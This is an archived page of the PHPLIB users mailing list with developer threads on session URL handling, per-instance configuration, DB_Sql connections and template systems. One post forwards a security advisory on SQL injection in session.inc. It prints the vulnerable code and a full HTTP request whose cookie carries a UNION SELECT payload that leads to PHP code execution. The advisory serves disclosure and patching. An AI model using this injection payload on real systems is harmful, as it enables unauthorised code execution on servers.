phplib-users Mailing List for PHPLIB (Page 4)
Brought to you by:
nhruby,
richardarcher
You can subscribe to this list here.
2001 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
(106) |
Sep
(99) |
Oct
(44) |
Nov
(97) |
Dec
(60) |
---|---|---|---|---|---|---|---|---|---|---|---|---|
2002 |
Jan
(56) |
Feb
(81) |
Mar
(134) |
Apr
(69) |
May
(106) |
Jun
(122) |
Jul
(98) |
Aug
(52) |
Sep
(184) |
Oct
(219) |
Nov
(102) |
Dec
(106) |
2003 |
Jan
(88) |
Feb
(37) |
Mar
(46) |
Apr
(51) |
May
(30) |
Jun
(17) |
Jul
(45) |
Aug
(19) |
Sep
(5) |
Oct
(4) |
Nov
(12) |
Dec
(7) |
2004 |
Jan
(11) |
Feb
(7) |
Mar
|
Apr
(15) |
May
(17) |
Jun
(13) |
Jul
(5) |
Aug
|
Sep
(8) |
Oct
(6) |
Nov
(21) |
Dec
(13) |
2005 |
Jan
(4) |
Feb
(3) |
Mar
(7) |
Apr
(7) |
May
|
Jun
(11) |
Jul
(7) |
Aug
|
Sep
|
Oct
|
Nov
(7) |
Dec
|
2006 |
Jan
(3) |
Feb
|
Mar
(1) |
Apr
|
May
|
Jun
(2) |
Jul
(1) |
Aug
|
Sep
|
Oct
(9) |
Nov
|
Dec
(5) |
2007 |
Jan
(15) |
Feb
(2) |
Mar
|
Apr
|
May
|
Jun
|
Jul
(9) |
Aug
|
Sep
(2) |
Oct
|
Nov
|
Dec
|
2008 |
Jan
|
Feb
|
Mar
|
Apr
(12) |
May
|
Jun
(3) |
Jul
(1) |
Aug
(19) |
Sep
(2) |
Oct
|
Nov
|
Dec
(6) |
2009 |
Jan
(1) |
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
(6) |
From: Frank B. <fb...@sy...> - 2007-01-02 13:03:33
|
Are there any plans to release an update that supports: register_long_arrays = Off This is the default setting on my php5 host. |
From: Lindsay H. <fmo...@fm...> - 2006-12-22 16:30:51
|
Content-Description: Forwarded message - Re: [phplib-users] Session url() method > Date: Sat, 16 Dec 2006 14:39:21 -0600 > From: Layne Weathers <la...@dr...> > To: php...@li... > Subject: Re: [phplib-users] Session url() method > > Lindsay Haisley wrote: > >Formerly if one were to set $sess->mode to "get", the url() > >method could be used to append the SID to both relative and > >absolute URIs. This is no longer possible for absolute URIs, > >and I had to patch session4.inc with code from the older > >session.inc to restore this functionality. > > If you would send the patch, I or one of the other core can look at > it and commit this change to CVS. > > -- > > Layne Weathers Layne, et al, Here's pseudo-code for this job. Would you all please take a look at this and see if you see any logical problems with the method? if (URL is relative and session.use_trans_id is set) return URL elseif ((URL is relative and session.use_trans_id is NOT set) or (URL is absolute)) if (mode is "get" or ((fallback_mode is "get") and (HTTP_COOKIE_VARS[session_name] is empty))) clean URL of (possibly bogus) session data and append current session data as GET if (mode is "cookie") return URL This assumes that session.use_trans_id can be tested even on early (<4.1.2) versions of PHP or that support for such early versions isn't needed. It also assumes that the typo/bug I reported re. session.use_only_cookies in session4.inc is fixed. -- Lindsay Haisley | "Fighting against human | PGP public key FMP Computer Services | creativity is like | available at 512-259-1190 | trying to eradicate | <http://pubkeys.fmp.com> http://www.fmp.com | dandelions" | | (Pamela Jones) | |
From: Lindsay H. <fmo...@fm...> - 2006-12-19 20:41:08
|
In the process of trying to get my head around rewriting the session4 url method, I came on the following typo in session4.inc. Perhaps this has already been fixed in CVS. --- session4.inc 2005-12-06 18:55:50.000000000 -0600 +++ session4.inc.fixed 2006-12-19 14:31:22.000000000 -0600 @@ -162,7 +162,7 @@ if ( $this->mode=="cookie" && $this->fallback_mode=="cookie") { - ini_set ("session.use_only_cookie","1"); + ini_set ("session.use_only_cookies","1"); } $this->set_tokenname(); The correct name for the php.ini variable is "session.use_only_cookies" (w. the English plural 'cookies'). -- Lindsay Haisley | "Fighting against human | PGP public key FMP Computer Services | creativity is like | available at 512-259-1190 | trying to eradicate | <http://pubkeys.fmp.com> http://www.fmp.com | dandelions" | | (Pamela Jones) | |
From: Lindsay H. <fmo...@fm...> - 2006-12-16 23:16:31
|
Thus spake Layne Weathers on Sat, Dec 16, 2006 at 02:39:21PM CST > Lindsay Haisley wrote: > >Formerly if one were to set $sess->mode to "get", the url() > >method could be used to append the SID to both relative and > >absolute URIs. This is no longer possible for absolute URIs, > >and I had to patch session4.inc with code from the older > >session.inc to restore this functionality. > > If you would send the patch, I or one of the other core can look at > it and commit this change to CVS. I'll take a look at it some more. I hacked what I needed into session4.inc and it works for my purposes but I need to make sure any patch I send is solid. Basically, for a first approximation, I simply inserted a bit of code from session.inc. --- /usr/share/phplib/session4.inc 2005-12-06 18:55:50.000000000 -0600 +++ session4.inc 2006-12-15 12:22:38.000000000 -0600 @@ -389,6 +389,15 @@ $url .= ( strpos($url, "?") != false ? "&" : "?" ) . urlencode($this->name) . "=" . $this->id; } + switch ($this->mode) { + case "get": + $url .= ( strpos($url, "?") != false ? "&" : "?" ). + urlencode($this->name)."=".$this->id; + break; + default: + ; + break; + } // Encode naughty characters in the URL $url = str_replace(array("<", ">", " ", "\"", "'"), array("%3C", "%3E", "+", "%22", "%27"), $url); There are issues in the application I'm using this in with the SID getting set twice (in duplicate) in the URL, so I have to find out if that's my cart implementation, or my patch, or what. The duplication doesn't harm things functionally, but it's messy and I don't want to submit a patch that doesn't do the Right Thing, and cleanly :-) -- Lindsay Haisley | "Fighting against human | PGP public key FMP Computer Services | creativity is like | available at 512-259-1190 | trying to eradicate | <http://pubkeys.fmp.com> http://www.fmp.com | dandelions" | | (Pamela Jones) | |
From: Layne W. <la...@dr...> - 2006-12-16 20:39:18
|
Lindsay Haisley wrote: >Formerly if one were to set $sess->mode to "get", the url() >method could be used to append the SID to both relative and >absolute URIs. This is no longer possible for absolute URIs, >and I had to patch session4.inc with code from the older >session.inc to restore this functionality. If you would send the patch, I or one of the other core can look at it and commit this change to CVS. --=20 Layne Weathers |
From: Lindsay H. <fmo...@fm...> - 2006-12-16 20:17:26
|
I note that the session4.inc module in phplib defers to PHP4's native session management and URL rewriting in the url() method. There's one shortcoming of this implementation. As the PHP documentation states, if session.use_trans_sid is set, "_relative_ URIs will be changed to contain the session id automatically." (emphasis mine) Formerly if one were to set $sess->mode to "get", the url() method could be used to append the SID to both relative and absolute URIs. This is no longer possible for absolute URIs, and I had to patch session4.inc with code from the older session.inc to restore this functionality. This comes up very specifically in an e-commerce situation where it's necessary to link to a secure page on the same server to collect customer info. For instance, a shopping catalog page may be at http://www.vendor.com/catalog.php, but the checkout page may be at https://secure.webhost.com/vendor/checkout.php. If a session cookie is set in the catalog page, the secure checkout page falls outside the cookie domain and so session continuity is lost. The logical solution here is to put the session name and SID into the URL as GET data. It's probably possible to use a call to setcookie() to work around this, but the behavior expected in previous versions of the url() session method is no longer supported. -- Lindsay Haisley | "Fighting against human | PGP public key FMP Computer Services | creativity is like | available at 512-259-1190 | trying to eradicate | <http://pubkeys.fmp.com> http://www.fmp.com | dandelions" | | (Pamela Jones) | |
From: Marko K. <mk...@mc...> - 2006-10-11 08:43:54
|
> Not that I know of. I use a very small include file to get the path > and make a real copy of that in each project. After that the other > files can be symlinks. I see, thanks for the hint! I'll try to set something like that up. Marko |
From: Layne W. <la...@dr...> - 2006-10-10 18:03:28
|
>Is there a way to get the true symbolic link as path using PHP >functions? Not that I know of. I use a very small include file to get the path and make a real copy of that in each project. After that the other files can be symlinks. --=20 Layne Weathers |
From: Marko K. <mk...@mc...> - 2006-10-10 14:00:44
|
sorry, typo, I meant "realpath" instead of "dirname" in my previous post: so that it looks like this: dirname(realpath(__FILE__)) to get the absolute path on my server. But I get the symlink already resolved. |
From: Marko K. <mk...@mc...> - 2006-10-09 13:13:58
|
Hi, anybody met the problem before to get the path without the symbolic link resolved. I use dirname(__FILE__) to get the absolute path on my server, but unfortunately the dirname already resolves symbolic links. This makes things trickyer. Is there a way to get the true symbolic link as path using PHP functions? Marko |
From: Marko K. <mk...@mc...> - 2006-10-06 11:00:45
|
Hi Layne, > The config file is symlinked to the includes directory and it is > prepended from there before local.inc. but how does every single instance decide which config directory to use? There should be a parameter given to the application somehow. Do you use a GET-Parameter in the entry-URL? Marko |
From: Marko K. <mk...@mc...> - 2006-10-05 15:45:25
|
> switch ($_SERVER['HTTP_HOST']) { > include_once($_SERVER['DOCUMENT_ROOT'] . well, this is an idea! Perhaps I could simply create several symbolic links to the real application source in the document root directory and direct the browsers to the wanted symbolic link. Then I could search in $_SERVER['DOCUMENT_ROOT'] and find out which local.inc I should use. Sounds good! Thanks for this idea! Regards, Marko |
From: Layne W. <la...@dr...> - 2006-10-05 15:44:47
|
Marko, I use config files for each separate instance of the app. The config file defines several constants that are then used throughout the app. The directory structure looks like: base/ docs/ includes/ setup/ configs/ instance_1/ instance_2/ templates/ The database part of the config file looks like: define("_DATABASE", "database_name"); define("_DB_HOST", "localhost"); define("_DB_USER", "username"); define("_DB_PASS", "password"); The config file is symlinked to the includes directory and it is prepended from there before local.inc. --=20 Layne Weathers |
From: patrick <pm...@s-...> - 2006-10-05 15:13:35
|
Marko Kaening wrote: > Hi folks, > > pretty quiet on this list. :) But perhaps it is simply because phplib > simply works. > > I met with my application a new requirement recently. I essentially want > to run the same application with different local.inc's. This makes sure > that every instance has its own session handling and user management, so > that both instances do not see and touch each other's databases. > > Up to now I simply duplicate the whole app directory, modify the local.inc > and point the browser to that source directory. > > Anybody knows a cleverer way to implement this without the need to copy > the whole source directory each time I set up a new instance? I thought > about am additional cookie (or get parameter as fall-back) or so, which > does the selection of the corresponding database-set specifiable in > various local.inc's... But I have no idea how to implement that > properly... > > Any hint for me from the community? > > Marko How do you determine which local goes with which instance? I do something like this for testing: In index.php: switch ($_SERVER['HTTP_HOST']) { case 'www.example.org': case 'example.org': default: include_once($_SERVER['DOCUMENT_ROOT'] . '/example/etc/example.php'); $protocol = 'https://'; break; case 'dev.example.org': include_once($_SERVER['DOCUMENT_ROOT'] . '/example/etc/example_test.php'); $protocol = 'http://'; break; } Then, in example.php (or where ever, really) you can set different DB credentials for session repository, cookies, etc. Not sure if this helps you. It's obviously predicated on different entry URLs. But I imagine you could do something with pseudo-random hashes each access... /patrick |
From: Marko K. <mk...@mc...> - 2006-10-05 14:57:37
|
Hi folks, pretty quiet on this list. :) But perhaps it is simply because phplib simply works. I met with my application a new requirement recently. I essentially want to run the same application with different local.inc's. This makes sure that every instance has its own session handling and user management, so that both instances do not see and touch each other's databases. Up to now I simply duplicate the whole app directory, modify the local.inc and point the browser to that source directory. Anybody knows a cleverer way to implement this without the need to copy the whole source directory each time I set up a new instance? I thought about am additional cookie (or get parameter as fall-back) or so, which does the selection of the corresponding database-set specifiable in various local.inc's... But I have no idea how to implement that properly... Any hint for me from the community? Marko |
From: Andrew C. <ph...@ev...> - 2006-07-09 20:30:44
|
Before I re-invent the wheel, I thought I would ask if anyone has written a version of perm that supports more than 31 levels of permissions. The existing system works okay but, I need to have at least 7 levels of user access with mostly inclusive permissions, for which I think I would require ~127 levels. Anyone? Andrew Crawford |
From: Richard A. <bo...@ju...> - 2006-06-02 20:55:14
|
At 6:45 AM +1000 3/6/06, Richard Archer wrote: >testing new mailman! Sorry folks, that message was supposed to be caught and discarded! ...Richard. |
From: Richard A. <bo...@ju...> - 2006-06-02 20:44:46
|
testing new mailman! |
From: Richard A. <rh...@ju...> - 2006-03-02 03:35:11
|
Greetings, James at GulfTech Security Research has kindly allowed me to post a draft of his upcoming security advisory to this list before he releases it to the general community. This will give PHPLIB users some time to upgrade before any potential exploit becomes available. I believe this only effects session.inc, not session4.inc. So if you are using PHPLIB with php4 sessions, this particular problem shouldn't be an issue for you. The solution to this vulnerability is to upgrade to 7.4a which is available from our Sourceforge download page: http://sourceforge.net/project/showfiles.php?group_id=31885 Or if you prefer, manually apply a patch to php/session.inc: http://cvs.sourceforge.net/viewcvs.py/phplib/php-lib-stable/php/session.inc?r1=1.19&r2=1.20 My thanks to James at GulfTech Security Research for alerting us to this problem and allowing time to release a solution before releasing the advisory. ...Richard. ---begin forwarded text GulfTech Security Research Advisory Remote Code Execution: There are some serious security issues in phplib's session handling that may allow an attacker to perform a range of attacks such as SQL Injection, and/or Remote Code Execution. ## Propagate the session id according to mode and lifetime. ## Will create a new id if necessary. To take over abandoned sessions, ## one may provide the new session id as a parameter (not recommended). function get_id($id = "") { global $HTTP_COOKIE_VARS, $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS; $this->newid=true; $this->name = $this->cookiename==""?$this->classname:$this->cookiename; if ( "" == $id ) { $this->newid=false; switch ($this->mode) { case "get": $id = isset($HTTP_GET_VARS[$this->name]) ? $HTTP_GET_VARS[$this->name] : ( isset($HTTP_POST_VARS[$this->name]) ? $HTTP_POST_VARS[$this->name] : "") ; break; case "cookie": $id = isset($HTTP_COOKIE_VARS[$this->name]) ? $HTTP_COOKIE_VARS[$this->name] : ""; break; default: die("This has not been coded yet."); break; } } ### do not accept user provided ids for creation if($id != "" && $this->block_alien_sid) { # somehow an id was provided by the user if($this->that->ac_get_value($id, $this->name) == "") { # no - the id doesn't exist in the database: Ignore it! $id = ""; } } The above code is from sessions.inc @ lines 85-121. The variable $id gets it's values from either GET or COOKIE and is never made safe before being passed to the function ac_get_value() which uses the variable in a query, thus allowing for SQL Injection. However, it is possible to manipulate the query in a way that php code is returned and passed to a vulnerable eval call. GET /phplib/pages/index.php3 HTTP/1.1 Host: example.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Cookie: Example_Session=' UNION SELECT 'cGhwaW5mbygpOw=='/* If-Modified-Since: Sat, 18 Feb 2006 18:24:34 GMT For example, the above request made to the index.php3 script that is shipped with phplib will successfully execute the phpinfo call. This could obviously be used for more sinister purposes such as running arbitrary system commands and the like. Also, since user authentication is not necessary to exploit this vulnerability, the risk of being exploited is much higher. ---end forwarded text |
From: Joe S. <jo...@be...> - 2006-01-27 20:12:24
|
on 01/26/2006 08:09 PM Mike Green said the following: > Do any of you know of any Content Management Systems (CMSs) that use the > PHPLib template library -- or any similar template system? > A couple: http://www.php-slash.org/ http://www.back-end.org/ Geeklog used an old version - http://www.geeklog.net/ that's a start, Joe p.s. not a cms but eGroupware still uses it for some modules but is moving away. > TIA! > > Mike Green |
From: Gaetano G. <giu...@se...> - 2006-01-27 11:22:52
|
SnVzdCBnb29nbGUgZm9yIHNtYXJ0eSArIGNtcywgYW5kIHlvdSB3aWxsIGZpbmQgc29tZS4NCg0K QWxtb3N0IGFsbCBwaHAtYmFzZWQgQ01TIHVzZSBvbmUgdGVtcGxhdGUgc3lzdGVtIG9yIGFub3Ro ZXIuDQplelB1Ymxpc2ggZm9yIGluc3RhbmNlIHVzZXMgaXRzIG93biBjdXN0b20gdGVtcGxhdGUg bGFuZ3VhZ2UuDQoNCkFGQUlLIHRoZSBwaHBsaWIgdGVtcGxhdGUgc3lzdGVtIGlzIG5vdCBpbiBt dWNoIHVzZSBhbnltb3JlLg0KDQpCeWUNCkdhZXRhbm8gR2l1bnRhDQogIC0tLS0tT3JpZ2luYWwg TWVzc2FnZS0tLS0tDQogIEZyb206IHBocGxpYi11c2Vycy1hZG1pbkBsaXN0cy5zb3VyY2Vmb3Jn ZS5uZXQgW21haWx0bzpwaHBsaWItdXNlcnMtYWRtaW5AbGlzdHMuc291cmNlZm9yZ2UubmV0XU9u IEJlaGFsZiBPZiBNaWtlIEdyZWVuDQogIFNlbnQ6IEZyaWRheSwgSmFudWFyeSAyNywgMjAwNiAz OjA5IEFNDQogIFRvOiBwaHBsaWItdXNlcnNAbGlzdHMuc291cmNlZm9yZ2UubmV0DQogIFN1Ympl Y3Q6IFtQaHBsaWItdXNlcnNdIENNU3MgdGhhdCB1c2UgdGVtcGxhdGVzDQoNCg0KICBEbyBhbnkg b2YgeW91IGtub3cgb2YgYW55IENvbnRlbnQgTWFuYWdlbWVudCBTeXN0ZW1zIChDTVNzKSB0aGF0 IHVzZSB0aGUgUEhQTGliIHRlbXBsYXRlIGxpYnJhcnkgLS0gb3IgYW55IHNpbWlsYXIgdGVtcGxh dGUgc3lzdGVtPw0KDQogIFRJQSENCg0KICBNaWtlIEdyZWVuDQo= |
From: Andrew C. <ph...@ev...> - 2005-11-09 01:10:06
|
Howdy, I haven't spent a lot of time dissecting the code in DB_Sql but, my understanding is that DB_Sql's connect() is an *internal* instance method, not intended for use like that. I would probably do the same thing by declaring a separate DB_Sql extension class for each database. That would be something like this: class DB_Example extends DB_Sql { var $classname = "db_example"; var $Host = "localhost"; var $Database = "DB1"; var $User = "example"; var $Password = "password"; var $Auto_Free = "true"; var $Halt_On_Error = "report"; } class DB_Example2 extends DB_Sql { var $classname = "db_example2"; var $Host = "localhost"; var $Database = "DB2"; var $User = "example2"; var $Password = "password2"; var $Auto_Free = "true"; var $Halt_On_Error = "report"; } Then, you could do basically the same thing this way: $exampledb = new DB_Example; $query = "SELECT name,id FROM FILE WHERE datatype='folder'"; $exampledb->query($query); while($exampledb->next_record()) { echo $exampledb->f(0) . "[" . $exampledb->f(1) . "]<br />\n"; } $exampledb2 = new DB_Example2; $query2 = "SELECT name,id FROM FILE WHERE datatype='folder'"; $exampledb2->query($query2); while($exampledb2->next_record()) { echo $exampledb->f(0) . "[" . $exampledb->f(1) . "]<br />\n"; } $exampledb->query($query); while($exampledb->next_record()) { echo $exampledb->f(0) . "[" . $exampledb->f(1) . "]<br />\n"; } This definitely works. Andrew Crawford Kelby Zorgdrager wrote: > Folks: > > Gotta question for you. I am experiencing a unexpected problem when > using the DB_Sql class. It appears that if I create a DB_Sql object to > one database (and perform a query) then create a second DB_Sql object > to another database (and perform a query), when I return to the first > object, it's connection state is invalid. Due to the architecture of > our app, I can not consolidate the two objects into one (that would be > reused). > > I have attached a sample as an example to show the problem. > > Assume for the example there are: > --> two databases, DB1 and DB2 > --> a table in each db (DB1.FILE and DB2.USER) > > I have attached two SQL files for the tables along with the example. > Any insight into why I am seeing this would be greatly appreciated. > > Thanks. > > KZ > > > ------------------------------------------------------------------------ > > <?php > include_once ("db_mysql.inc"); > > $dbConnection = new DB_Sql; > $dbConnection->Database = $dbName; > if (!$dbConnection->connect("DB1")) { > $error = "Failed to connect to $dbName"; > echo "Failed to initialize: $error<br>"; > exit; > } > > $dbConnection->query("SELECT name,id FROM FILE WHERE datatype='folder'"); > while($dbConnection->next_record()) { > echo "<BR>".$dbConnection->f(0)."[".$dbConnection->f(1)."]"; > } > > $dbConnection2 = new DB_Sql; > $dbConnection2->connect("DB2"); > $dbConnection->query("SELECT name,id FROM USER"); > while($dbConnection->next_record()) { > echo "<BR>".$dbConnection->f(0)."[".$dbConnection->f(1)."]"; > } > > /* > * when this is queried, it returns nothing.. even though it should > * return the same 'set' as the first time it was queried above. > */ > $dbConnection->query("SELECT name,id FROM FILE WHERE datatype='folder'"); > while($dbConnection->next_record()) { > echo "<BR>".$dbConnection->f(0)."[".$dbConnection->f(1)."]"; > } > ?> |
From: Kelby Z. <ke...@sa...> - 2005-11-08 22:24:40
|
Folks: Gotta question for you. I am experiencing a unexpected problem when using the DB_Sql class. It appears that if I create a DB_Sql object to one database (and perform a query) then create a second DB_Sql object to another database (and perform a query), when I return to the first object, it's connection state is invalid. Due to the architecture of our app, I can not consolidate the two objects into one (that would be reused). I have attached a sample as an example to show the problem. Assume for the example there are: --> two databases, DB1 and DB2 --> a table in each db (DB1.FILE and DB2.USER) I have attached two SQL files for the tables along with the example. Any insight into why I am seeing this would be greatly appreciated. Thanks. KZ |
From: <an...@sp...> - 2005-11-08 18:38:15
|
> Andreas, > > Session::url() only cleans out any session ids from the URL given to it > before adding the session id to the query string of that URL. > > Based on the fact that Session::url() only adds the session id if the > session is in GET mode, I'd guess that your code is adding the get vars > on top of the existing $_SERVER["REQUEST_URI"]. It's pretty simple to > remove those; you could use Session::url() as a guide for making a > generic function to handle that task. > Thanks a lot Layne, I'll try it. |
From: Layne W. <la...@dr...> - 2005-11-08 17:23:33
|
> I use it in a navigationbar, so if I click on one item and than on > the next item the url ever "knows" where I was before. It's ok, but I > don't like it, it looks so ugly. I thought there was something that > looks into the querystring and than deletes doubles and gives the > cleaned querystring back, but maybe I am wrong. There will come a day > for urlbeauty. :) Andreas, Session::url() only cleans out any session ids from the URL given to it before adding the session id to the query string of that URL. Based on the fact that Session::url() only adds the session id if the session is in GET mode, I'd guess that your code is adding the get vars on top of the existing $_SERVER["REQUEST_URI"]. It's pretty simple to remove those; you could use Session::url() as a guide for making a generic function to handle that task. --=20 Layne Weathers |